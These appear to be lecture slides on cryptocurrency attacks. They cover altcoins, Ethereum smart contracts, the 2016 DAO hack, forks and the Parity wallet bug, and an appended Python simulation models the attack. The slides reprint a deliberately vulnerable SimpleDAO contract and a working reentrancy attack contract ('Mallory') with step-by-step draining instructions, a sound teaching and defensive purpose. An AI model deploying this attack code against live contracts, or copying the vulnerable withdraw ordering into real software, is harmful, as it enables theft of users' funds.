Cryptocurrency Attacks

More Cryptocurrency Attacks

http://blockchain.unica.it/projects/ethereum-survey/index.html
http://hackingdistributed.com/2016/06/18/analysis-of-the-dao-exploit/
https://hackernoon.com/what-caused-the-latest-100-million-ethereum-bug-and-a-detection-tool-for-similar-bugs-7b80f8ab7279

Last Class
• Majority attacks
• Block withholding attacks
• Spam attacks
• Sybil attacks
• Blacklisting
• Fungibility
• Money laundering

Last Class
• With the rise of 51% attacks:
  • why? to what end?
  • when will this stop?
• What are the points of centralization in this network?
• Is this inevitable?

Cryptocurrencies
• First altcoin: Bitcoin testnet
• Second altcoin: Namecoin (DNS system)
• …
• over two thousand altcoins/tokens/etc.

But… why?
• Improvements to Bitcoin
• Alternatives to Bitcoin
• Other functionality complementary to Bitcoin
• Make money for founders

But… how?
• Altcoins: have their own blockchain
• Tokens: built on top of cryptocurrencies

Alternative Proof of Work Mechanisms
• Litecoin: scrypt
• Cuckoo Cycle
• etc.

Alternative functionality
• NameCoin: DNS system
• Ethereum: Turing complete
• ZCash/Monero/others: “Private”

Namecoin
• “completes” Zooko’s Triangle
• Blockchain-based DNS
• First fork of Bitcoin
• Merge mined with Bitcoin:
  • same hash function

Ethereum
• Currently the second most popular cryptocurrency
• First proposed as a system built on top of Bitcoin
• Started to create Turing-complete money contracts (“smart contracts”)
• Ether: currency which is input/output to contracts
• Gas: execution cost of instructions

Smart Contracts
• Run on blockchain and executed by all nodes
• Created by posting a transaction
• Identified by address
• Can hold, receive, and send money
• Once deployed, cannot be changed

Ethereum uses
• DApps
  • Distributed applications
  • CryptoKitties!
  • Ponzi schemes!
• Tokens
  • https://coinmarketcap.com/tokens/views/all/

The DAO
• Crowdfunding platform
• Envisioned as a leaderless organization
• Anybody could hold DAO tokens
• DAO creators together agreed on rules
• Raised 12.7M Ether ($150M)

Simplified DAO
• Solidity:
  • high-level programming language to write smart contracts with
  • python-ish
• Enter contract: donate
• Exit contract: withdraw
• Fallback option:

Simplified DAO

    contract SimpleDAO {
      mapping (address => uint) public credit;

      function donate(address to) {
        credit[to] += msg.value;
      }

      function queryCredit(address to) returns (uint) {
        return credit[to];
      }

      function withdraw(uint amount) {
        if (credit[msg.sender] >= amount) {
          // The external call runs before the credit is reduced.
          msg.sender.call.value(amount)();
          credit[msg.sender] -= amount;
        }
      }
    }

Attack

    contract Mallory {
      SimpleDAO public dao = SimpleDAO(0x354...);
      address owner;

      function Mallory() { owner = msg.sender; }

      // Fallback function: runs whenever Mallory receives a call.
      function() { dao.withdraw(dao.queryCredit(this)); }

      function getJackpot() { owner.send(this.balance); }
    }

Attack

    contract SimpleDAO {
      mapping (address => uint) public credit;

      function donate(address to) {
        credit[to] += msg.value;
      }

      function queryCredit(address to) returns (uint) {
        return credit[to];
      }
      // withdraw() is not shown on this slide
    }

Step 1: Attacker donates ether for Mallory.

Attack

    contract Mallory {
      SimpleDAO public dao = SimpleDAO(0x354...);
      address owner;

      function Mallory() { owner = msg.sender; }

      function() { dao.withdraw(dao.queryCredit(this)); }

      function getJackpot() { owner.send(this.balance); }
    }

Step 1: Attacker donates ether for Mallory. This triggers Mallory’s fallback.

Attack

    function withdraw(uint amount) {
      if (credit[msg.sender] >= amount) {
        msg.sender.call.value(amount)();
        credit[msg.sender] -= amount;
      }
    }

Step 2: Mallory’s fallback calls the withdraw function.

Attack

    function withdraw(uint amount) {
      if (credit[msg.sender] >= amount) {
        msg.sender.call.value(amount)();
        credit[msg.sender] -= amount;
      }
    }

Step 3: The withdraw function then invokes Mallory’s default again via call.
Attack

    contract Mallory {
      SimpleDAO public dao = SimpleDAO(0x354...);
      address owner;

      function Mallory() { owner = msg.sender; }

      function() { dao.withdraw(dao.queryCredit(this)); }

      function getJackpot() { owner.send(this.balance); }
    }

Step 4: We then attempt to withdraw again. The last call to withdraw was interrupted before it could update the credit field, so we still have ether to withdraw!

Attack
• We can repeat ad nauseam until:
  • contract gas is exhausted OR
  • balance of DAO is zero.

But wait!
7 days before drain started

But wait!
5 days before drain started

But wait!
• Code was attacked after it was patched.
• But how can that be?
• Remember: once deployed, cannot change

Ethereum Price Shock

Forks
• Fork: update in software
• Hard Fork
  • requires software update; old version incompatible
• Soft Fork
  • old version compatible with new software

Forks

What to do next with Ethereum?
• Nothing
• Gas limit
• Ban spam addresses
• Soft Fork
• Hard Fork

What happened next
https://www.ofnumbers.com/2016/07/28/ethereum-core-and-ethereum-classic-for-dummies/

Parity Multisig
• Ethereum Wallet
• One person “killing” a wallet killed every wallet that relied on the contract

Questions
• If we can’t secure code in a normal case, how will we be able to secure it on a blockchain?
• Do new blockchains create decentralization or centralization pressures? how?
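
Added example, not part of the original slides: a toy Python model of the SimpleDAO and Mallory contracts from the Attack slides. It runs withdraw once in the slides' order (call out, then update credit) and once with the credit updated before the call, so the effect of the ordering can be compared. The Python names, the `max_depth` stand-in for gas exhaustion and the sample amounts are assumptions.

```python
# Constructed toy model of the slides' SimpleDAO and Mallory; not EVM-accurate.
class SimpleDAO:
    def __init__(self, effects_first, max_depth=64):
        self.credit, self.balance = {}, 0      # credit per address, ether held
        self.effects_first = effects_first
        self.max_depth, self.depth = max_depth, 0  # assumed stand-in for gas exhaustion

    def donate(self, to, value):
        self.balance += value
        self.credit[to] = self.credit.get(to, 0) + value

    def query_credit(self, addr):
        return self.credit.get(addr, 0)

    def withdraw(self, caller, amount):
        if self.query_credit(caller.addr) < amount:
            return
        if self.effects_first:      # hardened order: update credit, then call out
            self.credit[caller.addr] -= amount
            self._call_value(caller, amount)
        else:                       # order on the slides: call out, then update credit
            self._call_value(caller, amount)
            # uint arithmetic wraps silently in the Solidity dialect on the slides
            self.credit[caller.addr] = (self.credit[caller.addr] - amount) % 2**256

    def _call_value(self, caller, amount):
        # Models msg.sender.call.value(amount)(): failure is returned and ignored.
        if self.balance < amount or self.depth >= self.max_depth:
            return False
        self.balance -= amount
        caller.balance += amount
        self.depth += 1
        caller.fallback()           # control passes to the recipient's code
        self.depth -= 1
        return True

class Mallory:
    addr = "mallory"
    def __init__(self, dao):
        self.dao, self.balance = dao, 0
    def fallback(self):
        self.dao.withdraw(self, self.dao.query_credit(self.addr))

def run(effects_first, others=9, stake=1, max_depth=64):
    """Return (Mallory's balance, DAO balance) after one withdrawal request."""
    dao = SimpleDAO(effects_first, max_depth)
    dao.donate("honest-users", others)   # constructed sample deposits
    mallory = Mallory(dao)
    dao.donate(mallory.addr, stake)
    mallory.fallback()
    return mallory.balance, dao.balance
```

With the slides' ordering the model ends when the DAO balance reaches zero or the depth limit is hit, matching the two stop conditions on the slide; with the credit updated first, Mallory receives only the amount credited to it.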
